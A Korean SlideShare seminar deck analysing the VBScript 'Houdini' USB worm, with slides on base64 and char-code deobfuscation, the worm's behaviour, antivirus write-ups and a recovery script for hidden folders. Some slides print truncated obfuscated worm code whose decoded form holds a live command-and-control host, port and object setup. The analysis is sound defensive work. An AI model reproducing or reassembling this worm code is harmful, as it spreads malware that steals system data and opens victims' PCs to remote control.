SlideShare a Scribd company logo

VBScript USB 악성코드 분석

Sangwon Yi
Sangwon Yi

학교 실험실 컴퓨터에서 USB로 옮아온 VBScript 악성코드를 분석해보았습니다. 또, 일반적인 방법으로는 숨김 표시를 지우기 힘든 파일을 복구하는 스크립트를 짜 보았습니다. * 한양대학교 ICEWALL, 숙명여자대학교 SISS, 고려대학교 KUICS의 연합 세미나 KUSISWALL에서 발표한 슬라이드입니다.

Technology
1 of 25
Download to read offline
VBScript 악성코드 분석 한양대학교 ICEWALL 이상원 devleoper 2015/06/27 @ KUSISWALL
devleoper이상원 • 한양대학교 컴퓨터전공 / ICEWALL 회원 • devleoper 오타난 거 아니에요. • php를 예전에 썼었고 요즘은 Ruby를 주로 쓰고
 웹 개발에 인연이 생겨 웹과 네트워크 보안을 공부합니다. • leo.re.kr
 twitter @devleoper
 fb.me/devleoper
시작 • 학교 실험실에 USB를 꽂았다가 옮은 악성코드 • OS X을 쓰니 감염될 일은 없었지만… 한번 뜯어볼까 • 찾아보니 VBScript로 짜여진(.vbs) 악성코드 • 함께 뜯어 봅시다
스크립트 언어 • 프로그램이 실행되는 순간 소스 코드를 읽어서
 실시간으로 실행시켜 주는 언어 • 매번 컴파일해서 써야 하는 언어가 불편할 때 편리 • 컴퓨터 성능이 좋아지니 많이 사용되고 있습니다 • 소스 코드 상태로 배포되는 프로그램이 많습니다 • PHP, Python, Ruby, JavaScript, VBScript
VBScript • 마이크로소프트가 만든 스크립트 언어 • 윈도우 98 이후 대부분의 윈도우에 기본 탑재 • 이름 그대로 Visual Basic의 문법을 따왔어요 • 잘나갈때는 ASP로 웹 개발할때도 쓰던 언어
파일을 열어보니… ali  =  fuck(“UkZwRFRFOVdSVklnUFNBaU16bDhaSHA4TmpCOFpIcDhPVEY4WkhwOE16SjhaSHA4TVRFMGZHUjZmREV3TVh4a2Vudz   VPWHhrZW53eE1URjhaSHA4TVRBd2ZHUjZmREV3TVh4a2Vud3hNVFI4WkhwOE16SjhaSHA4TlRoOFpIcDhNeko4WkhwOE1UQTBmR1I2 ZkRFeE1YeGtlbnd4TVRkOFpIcDhNVEF3ZkdSNmZERXdOWHhrZW53eE1UQjhaSHA4TVRBMWZHUjZmRE15ZkdSNmZEUXdmR1I2ZkRrNW ZHUjZmRFF4ZkdSNmZETXlmR1I2ZkRFeE5YeGtlbnd4TURkOFpIcDhNVEl4ZkdSNmZERXhNbnhrZW53eE1ERjhaSHA4TXpKOFpIcDhO VGg4WkhwOE16SjhaSHA4TVRBMGZHUjZmREV4TVh4a2Vud3hNVGQ4WkhwOE1UQXdmR1I2ZkRFd05YeGtlbnd4TVRCOFpIcDhNVEExZk dSNmZEUTFmR1I2ZkRFd01ueGtlbnd4TWpCOFpIcDhNeko4WkhwOE9UTjhaSHA4TmpKOFpIcDhNVE44WkhwOE1UQjhaSHA4TVROOFpI cDhNVEI4WkhwOE16bDhaSHA4TmpGOFpIcDhORFY4WkhwOE5qRjhaSHA4TkRWOFpIcDhOakY4WkhwOE5EVjhaSHA4TmpGOFpIcDhORF Y4WkhwOE5qRjhaSHA4TXpKOFpIcDhPVGw4WkhwOE1URXhmR1I2ZkRFeE1IeGtlbnd4TURKOFpIcDhNVEExZkdSNmZERXdNM3hrZW53 ek1ueGtlbncyTVh4a2VudzBOWHhrZW53Mk1YeGtlbncwTlh4a2VudzJNWHhrZW53ME5YeGtlbncyTVh4a2VudzBOWHhrZW53Mk1YeG tlbncwTlh4a2VudzJNWHhrZW53ME5YeGtlbncyTVh4a2VudzBOWHhrZW53Mk1YeGtlbncwTlh4a2VudzJNWHhrZW53ME5YeGtlbncy TVh4a2VudzBOWHhrZW53Mk1YeGtlbncwTlh4a2VudzJNWHhrZW53ME5YeGtlbncyTVh4a2VudzBOWHhrZW53Mk1YeGtlbncwTlh4a2 VudzJNWHhrZW53eE0zeGtlbnd4TUh4a2Vud3hNM3hrZW53eE1IeGtlbnd4TURSOFpIcDhNVEV4ZkdSNmZERXhOWHhrZW53eE1UWjha SHA4TXpKOFpIcDhOakY4WkhwOE16SjhaSHA4TXpSOFpIcDhNVEF5ZkdSNmZERXdNbnhrZW53ME5ueGtlbnd4TVRWOFpIcDhNVEF4Zk dSNmZERXhOSHhrZW53eE1UaDhaSHA4TVRBeGZHUjZmRGs0ZkdSNmZERXdPSHhrZW53eE1URjhaSHA4TVRBemZHUjZmRFEyZkdSNmZE RXhNSHhrZW53eE1ERjhaSHA4TVRFMmZHUjZmRE0wZkdSNmZERXpmR1I2ZkRFd2ZHUjZmREV4TW54a2Vud3hNVEY4WkhwOE1URTBmR1 I2ZkRFeE5ueGtlbnd6TW54a2VudzJNWHhrZW53ek1ueGtlbncxTTN4a2VudzBPSHhrZW53ME9IeGtlbncwT0h4a2Vud3hNM3hrZW53 eE1IeGtlbnd4TURWOFpIcDhNVEV3ZkdSNmZERXhOWHhrZW53eE1UWjhaSHA4T1RkOFpIcDhNVEE0ZkdSNmZERXdPSHhrZW53eE1EQj haSHA4TVRBMWZHUjZmREV4Tkh4a2Vud3pNbnhrZW53Mk1YeGtlbnd6TW54a2Vud3pOSHhrZW53ek4zeGtlbnd4TVRaOFpIcDhNVEF4 ZkdSNmZERXdPWHhrZW53eE1USjhaSHA4TXpkOFpIcDhNelI4WkhwOE1UTjhaSHA4TVRCOFpIcDhNVEE0ZkdSNmZERXhNSHhrZW53eE 1EZDhaSHA4TVRBeWZHUjZmREV3Tlh4a2Vud3hNRGg4WkhwOE1UQXhmR1I2ZkRNeWZHUjZmRFl4ZkdSNmZETXlmR1I2ZkRFeE5ueGtl bnd4TVRSOFpIcDhNVEUzZkdSNmZERXdNWHhrZW53eE0zeGtlbnd4TUh4a2Vud3hNRGg4WkhwOE1URXdmR1I2ZkRFd04zeGtlbnd4TU RKOFpIcDhNVEV4ZkdSNmZERXdPSHhrZW53eE1EQjhaSHA4TVRBeGZHUjZmREV4Tkh4a2Vud3pNbnhrZW53Mk1YeGtlbnd6TW54a2Vu d3hNVFo4WkhwOE1URTBmR1I2ZkRFeE4zeGtlbnd4TURGOFpIcDhNVE44WkhwOE1UQjhaSHA4TVROOFpIcDhNVEI4WkhwOE16bDhaSH A4TmpGOFpIcDhORFY4WkhwOE5qRjhaSHA4TkRWOFpIcDhOakY4WkhwOE5EVjhaSHA4TmpGOFpIcDhORFY4WkhwOE5qRjhaSHA4TXpK OFpIcDhNVEV5ZkdSNmZERXhOM3hrZW53NU9IeGtlbnd4TURoOFpIcDhNVEExZkdSNmZEazVmR1I2ZkRNeWZHUjZmREV4T0h4a2Vudz VOM3hrZW53eE1UUjhaSHA4TXpKOFpIcDhOakY4WkhwOE5EVjhaSHA4TmpGOFpIcDhORFY4WkhwOE5qRjhaSHA4TkRWOFpIcDhOakY4 WkhwOE5EVjhaSHA4TmpGOFpIcDhORFY4WkhwOE5qRjhaSHA4TkRWOFpIcDhOakY4WkhwOE5EVjhaSHA4TmpGOFpIcDhORFY4WkhwOE
Base64 • 바이너리 값을 사람이 볼 수 있는 문자로 표현하는 방법 • 대문자 + 소문자 + 숫자 + 더하기랑 슬래시 해서 64 • 비트를 앞에서부터 6비트씩 잘라서 표현 • 엄청 간단하기 때문에 암호화라고 보기는 좀… L                e                o   01001100  01100101  01101111   T          G            V            v 원본 바이너리 base64
아래로 내려가보니….
두번 디코딩하고 나면… DZCLOVER  =  "39|dz|60|dz|91|dz|32|dz|114|dz|101|dz|99|dz|111|dz|100|dz|101|dz|114|dz|32|dz|58|dz|32|dz| 104|dz|111|dz|117|dz|100|dz|105|dz|110|dz|105|dz|32|dz|40|dz|99|dz|41|dz|32|dz|115|dz|107|dz|121|dz| 112|dz|101|dz|32|dz|58|dz|32|dz|104|dz|111|dz|117|dz|100|dz|105|dz|110|dz|105|dz|45|dz|102|dz|120|dz| 32|dz|93|dz|62|dz|13|dz|10|dz|13|dz|10|dz|39|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz| 32|dz|99|dz|111|dz|110|dz|102|dz|105|dz|103|dz|32|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz| 61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz| 45|dz|61|dz|45|dz|61|dz|13|dz|10|dz|13|dz|10|dz|104|dz|111|dz|115|dz|116|dz|32|dz|61|dz|32|dz|34|dz| 102|dz|102|dz|46|dz|115|dz|101|dz|114|dz|118|dz|101|dz|98|dz|108|dz|111|dz|103|dz|46|dz|110|dz|101|dz| 116|dz|34|dz|13|dz|10|dz|112|dz|111|dz|114|dz|116|dz|32|dz|61|dz|32|dz|53|dz|48|dz|48|dz|48|dz|13|dz| 10|dz|105|dz|110|dz|115|dz|116|dz|97|dz|108|dz|108|dz|100|dz|105|dz|114|dz|32|dz|61|dz|32|dz|34|dz|37| dz|116|dz|101|dz|109|dz|112|dz|37|dz|34|dz|13|dz|10|dz|108|dz|110|dz|107|dz|102|dz|105|dz|108|dz|101| dz|32|dz|61|dz|32|dz|116|dz|114|dz|117|dz|101|dz|13|dz|10|dz|108|dz|110|dz|107|dz|102|dz|111|dz|108| dz|100|dz|101|dz|114|dz|32|dz|61|dz|32|dz|116|dz|114|dz|117|dz|101|dz|13|dz|10|dz|13|dz|10|dz|39|dz| 61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|32|dz|112|dz|117|dz|98|dz|108|dz|105|dz|99|dz| 32|dz|118|dz|97|dz|114|dz|32|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45| dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|13|dz|10|dz|13|dz|10| dz|100|dz|105|dz|109|dz|32|dz|115|dz|104|dz|101|dz|108|dz|108|dz|111|dz|98|dz|106|dz|32|dz|13|dz|10| dz|115|dz|101|dz|116|dz|32|dz|115|dz|104|dz|101|dz|108|dz|108|dz|111|dz|98|dz|106|dz|32|dz|61|dz|32| dz|119|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|46|dz|99|dz|114|dz|101|dz|97|dz|116|dz|101|dz|111| dz|98|dz|106|dz|101|dz|99|dz|116|dz|40|dz|34|dz|119|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|46|dz| 115|dz|104|dz|101|dz|108|dz|108|dz|34|dz|41|dz|13|dz|10|dz|100|dz|105|dz|109|dz|32|dz|102|dz|105|dz| 108|dz|101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106|dz|13|dz|10|dz|115|dz|101|dz| 116|dz|32|dz|102|dz|105|dz|108|dz|101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106| dz|32|dz|61|dz|32|dz|99|dz|114|dz|101|dz|97|dz|116|dz|101|dz|111|dz|98|dz|106|dz|101|dz|99|dz|116|dz| 40|dz|34|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|105|dz|110|dz|103|dz|46|dz|102|dz|105|dz|108|dz| 101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106|dz|101|dz|99|dz|116|dz|34|dz|41|dz| 13|dz|10|dz|100|dz|105|dz|109|dz|32|dz|104|dz|116|dz|116|dz|112|dz|111|dz|98|dz|106|dz|13|dz|10|dz| 115|dz|101|dz|116|dz|32|dz|104|dz|116|dz|116|dz|112|dz|111|dz|98|dz|106|dz|32|dz|61|dz|32|dz|99|dz|114
두번 디코딩하고 나면… DZCLOVER  =  "39|dz|60|dz|91|dz|32|dz|114|dz|101|dz|99|dz|111|dz|100|dz|101|dz|114|dz|32|dz|58|dz|32|dz| 104|dz|111|dz|117|dz|100|dz|105|dz|110|dz|105|dz|32|dz|40|dz|99|dz|41|dz|32|dz|115|dz|107|dz|121|dz| 112|dz|101|dz|32|dz|58|dz|32|dz|104|dz|111|dz|117|dz|100|dz|105|dz|110|dz|105|dz|45|dz|102|dz|120|dz| 32|dz|93|dz|62|dz|13|dz|10|dz|13|dz|10|dz|39|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz| 32|dz|99|dz|111|dz|110|dz|102|dz|105|dz|103|dz|32|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz| 61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz| 45|dz|61|dz|45|dz|61|dz|13|dz|10|dz|13|dz|10|dz|104|dz|111|dz|115|dz|116|dz|32|dz|61|dz|32|dz|34|dz| 102|dz|102|dz|46|dz|115|dz|101|dz|114|dz|118|dz|101|dz|98|dz|108|dz|111|dz|103|dz|46|dz|110|dz|101|dz| 116|dz|34|dz|13|dz|10|dz|112|dz|111|dz|114|dz|116|dz|32|dz|61|dz|32|dz|53|dz|48|dz|48|dz|48|dz|13|dz| 10|dz|105|dz|110|dz|115|dz|116|dz|97|dz|108|dz|108|dz|100|dz|105|dz|114|dz|32|dz|61|dz|32|dz|34|dz|37| dz|116|dz|101|dz|109|dz|112|dz|37|dz|34|dz|13|dz|10|dz|108|dz|110|dz|107|dz|102|dz|105|dz|108|dz|101| dz|32|dz|61|dz|32|dz|116|dz|114|dz|117|dz|101|dz|13|dz|10|dz|108|dz|110|dz|107|dz|102|dz|111|dz|108| dz|100|dz|101|dz|114|dz|32|dz|61|dz|32|dz|116|dz|114|dz|117|dz|101|dz|13|dz|10|dz|13|dz|10|dz|39|dz| 61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|32|dz|112|dz|117|dz|98|dz|108|dz|105|dz|99|dz| 32|dz|118|dz|97|dz|114|dz|32|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45| dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|45|dz|61|dz|13|dz|10|dz|13|dz|10| dz|100|dz|105|dz|109|dz|32|dz|115|dz|104|dz|101|dz|108|dz|108|dz|111|dz|98|dz|106|dz|32|dz|13|dz|10| dz|115|dz|101|dz|116|dz|32|dz|115|dz|104|dz|101|dz|108|dz|108|dz|111|dz|98|dz|106|dz|32|dz|61|dz|32| dz|119|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|46|dz|99|dz|114|dz|101|dz|97|dz|116|dz|101|dz|111| dz|98|dz|106|dz|101|dz|99|dz|116|dz|40|dz|34|dz|119|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|46|dz| 115|dz|104|dz|101|dz|108|dz|108|dz|34|dz|41|dz|13|dz|10|dz|100|dz|105|dz|109|dz|32|dz|102|dz|105|dz| 108|dz|101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106|dz|13|dz|10|dz|115|dz|101|dz| 116|dz|32|dz|102|dz|105|dz|108|dz|101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106| dz|32|dz|61|dz|32|dz|99|dz|114|dz|101|dz|97|dz|116|dz|101|dz|111|dz|98|dz|106|dz|101|dz|99|dz|116|dz| 40|dz|34|dz|115|dz|99|dz|114|dz|105|dz|112|dz|116|dz|105|dz|110|dz|103|dz|46|dz|102|dz|105|dz|108|dz| 101|dz|115|dz|121|dz|115|dz|116|dz|101|dz|109|dz|111|dz|98|dz|106|dz|101|dz|99|dz|116|dz|34|dz|41|dz| 13|dz|10|dz|100|dz|105|dz|109|dz|32|dz|104|dz|116|dz|116|dz|112|dz|111|dz|98|dz|106|dz|13|dz|10|dz| 115|dz|101|dz|116|dz|32|dz|104|dz|116|dz|116|dz|112|dz|111|dz|98|dz|106|dz|32|dz|61|dz|32|dz|99|dz|114
아이 갓 더 소스
소스를 열어보니 • 예쁘게 주석도 달려 있고 들여쓰기도 잘 해놓았어요 • 무한 루프로 계속해서 돌아가면서 다른 저장 장치가 연결되거나 폴더가 새로 생기면 숨기고…
소스를 열어보니 • 지정된 서버에 컴퓨터의 이름이나 사용자 이름, 설치 된 하드웨어나 안티바이러스 소프트웨어 목록을 전송
소스를 열어보니 • 지정된 서버에서 파일을 다운받거나
 업로드하는 코드도 발견
다른 곳에서는 어떻게 보나? • VirusTotal에 제출해보니 57개 안티바이러스
 소프트웨어 중 33개가 이 악성코드를 진단 • Windows Defender 최신 버전을 사용한다면
 감염된 USB 꽂았을 때 즉시 초고속★삭제 https://www.virustotal.com/ko/file/84b5033d5acd2a964dcf2ddd9d8c840aa8b8a9a8bc860bbce946fc9cf7642cda/analysis/
다른 곳에서는 어떻게 보나? http://www.symantec.com/security_response/writeup.jsp?docid=2013-091222-3652-99 http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Worm%3AVBS%2FDunihi.A USB나 제거 가능한 매체를 통해 전파됩니다. 해커가 귀하의 PC를 액세스할 수 있도록 합니다. • 원격 서버에 HTTP POST 요청을 보냅니다.
 (PC 이름, 사용자 이름, 디스크 볼륨과 시리얼, 운영 체제
 버전, 안티바이러스 소프트웨어 목록 등을 전송) • 감염자의 PC에서 명령을 실행합니다. • 파일을 다운로드하고 실행합니다. • 로컬 파일을 공격자에게 전송합니다. • …
정리 • 스크립트 언어에서는 난독화해봤자 어차피 원래 소스 가 되어서(eval) 실행되기 때문에 쓸모 없음 • 괜히 공용 컴퓨터에 USB 못 꽂게 하는게 아닌듯 • 위험은 우리 주변을 늘 도사리고 있으니 남의 USB
 꽂아주지도, 남의 컴퓨터에 USB 꽂지도 말자!
…이 아니고, 치료는 했는데 
 내 폴더가 안 보이잖아! 끝…
…이 아니고, 치료는 했는데 
 내 폴더가 안 보이잖아!
바로가기 만들고 숨기면서 무슨 짓을 했던 걸까요?
도와줘요 테크넷! 상수 값 설명 일반 0 아무런 attribute 값이 없을 때 읽기 전용 1 읽을 수는 있지만 수정은 안 됨 숨김 2 내 컴퓨터나 Windows 탐색기에서 보이지 않음 시스템 4 운영체제에서 필요로 하는 파일 https://technet.microsoft.com/en-us/library/ee198707.aspx • FileSystemObj에서 파일의 속성 값을 불러오거나 변경 할 때는 상수에 해당하는 값을 더하는 걸로 계산합니다.
 (마치 유닉스 시스템의 퍼미션처럼) 2 + 4 = 숨김 파일 + 시스템 파일
체크를 풀면 보이긴 하지만… • 보호된 운영체제 파일로 간주되어 일반적인 방법으로 볼 수도 없고 보호를 풀 수도 없음.
원상 복귀 스크립트 만들기 https://gist.github.com/devleoper/60262bf56077d8d3e35d
한번 더 정리 • 지금까지 Houdini Worm을 분석하고
 우리들의 USB를 원상 복귀하는것까지 알아봤습니다. • USB는 잘 챙겨야겠습니다. • 공용 컴퓨터에 파일 옮길때는 클라우드가 안전하…죠? • 스크립트 언어는 배워두면 좋습니다.
진짜 끝 감사합니다 twitter @devleoper
 fb.me/devleoper

Recommended

2012,我的技术之选
2012,我的技术之选2012,我的技术之选
2012,我的技术之选
勇浩 赖
 
옷 갈아입게 해주세요
옷 갈아입게 해주세요옷 갈아입게 해주세요
옷 갈아입게 해주세요
Sangwon Yi
 
しごとで使うTitanium 第2版
しごとで使うTitanium 第2版しごとで使うTitanium 第2版
しごとで使うTitanium 第2版
忠利 花崎
 
資訊科技報告 自由軟體與資訊產業的未來
資訊科技報告 自由軟體與資訊產業的未來資訊科技報告 自由軟體與資訊產業的未來
資訊科技報告 自由軟體與資訊產業的未來
p085158
 
Universal windows apps 開發—運用 html 及 java script
Universal windows apps 開發—運用 html 及 java scriptUniversal windows apps 開發—運用 html 及 java script
Universal windows apps 開發—運用 html 及 java script
Ian Chen
 
SITCON2021 Web Security 領航之路
SITCON2021 Web Security 領航之路SITCON2021 Web Security 領航之路
SITCON2021 Web Security 領航之路
Tzu-Ting(Fei) Lin
 
前端大型系統的基石 TypeScript
前端大型系統的基石 TypeScript前端大型系統的基石 TypeScript
前端大型系統的基石 TypeScript
Gelis Wu
 
讓軟體開發與應用更自由 - 使用 Docker 技術
讓軟體開發與應用更自由 - 使用 Docker 技術讓軟體開發與應用更自由 - 使用 Docker 技術
讓軟體開發與應用更自由 - 使用 Docker 技術
Yu Lung Shao
 

Recommended

2012,我的技术之选
2012,我的技术之选2012,我的技术之选
2012,我的技术之选
勇浩 赖
 
옷 갈아입게 해주세요
옷 갈아입게 해주세요옷 갈아입게 해주세요
옷 갈아입게 해주세요
Sangwon Yi
 
しごとで使うTitanium 第2版
しごとで使うTitanium 第2版しごとで使うTitanium 第2版
しごとで使うTitanium 第2版
忠利 花崎
 
資訊科技報告 自由軟體與資訊產業的未來
資訊科技報告 自由軟體與資訊產業的未來資訊科技報告 自由軟體與資訊產業的未來
資訊科技報告 自由軟體與資訊產業的未來
p085158
 
Universal windows apps 開發—運用 html 及 java script
Universal windows apps 開發—運用 html 及 java scriptUniversal windows apps 開發—運用 html 及 java script
Universal windows apps 開發—運用 html 及 java script
Ian Chen
 
SITCON2021 Web Security 領航之路
SITCON2021 Web Security 領航之路SITCON2021 Web Security 領航之路
SITCON2021 Web Security 領航之路
Tzu-Ting(Fei) Lin
 
前端大型系統的基石 TypeScript
前端大型系統的基石 TypeScript前端大型系統的基石 TypeScript
前端大型系統的基石 TypeScript
Gelis Wu
 
讓軟體開發與應用更自由 - 使用 Docker 技術
讓軟體開發與應用更自由 - 使用 Docker 技術讓軟體開發與應用更自由 - 使用 Docker 技術
讓軟體開發與應用更自由 - 使用 Docker 技術
Yu Lung Shao
 
2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
Marius Sescu
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
Expeed Software
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
Pixeldarts
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
ThinkNow
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
marketingartwork
 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture Code
Skeleton Technologies
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
Neil Kimberley
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
contently
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
Albert Qian
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
Kurio // The Social Media Age(ncy)
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
Search Engine Journal
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
SpeakerHub
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next
Tessa Mero
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Lily Ray
 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations
Rajiv Jayarajah, MAppComm, ACC
 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data Science
Christy Abraham Joy
 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best Practices
Vit Horky
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project management
MindGenius
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
RachelPearson36
 

More Related Content

Featured

How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
ThinkNow
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
Kurio // The Social Media Age(ncy)
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
Search Engine Journal
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
SpeakerHub
 

Featured (20)

2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture Code
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations
 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data Science
 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best Practices
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project management
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
 

VBScript USB 악성코드 분석
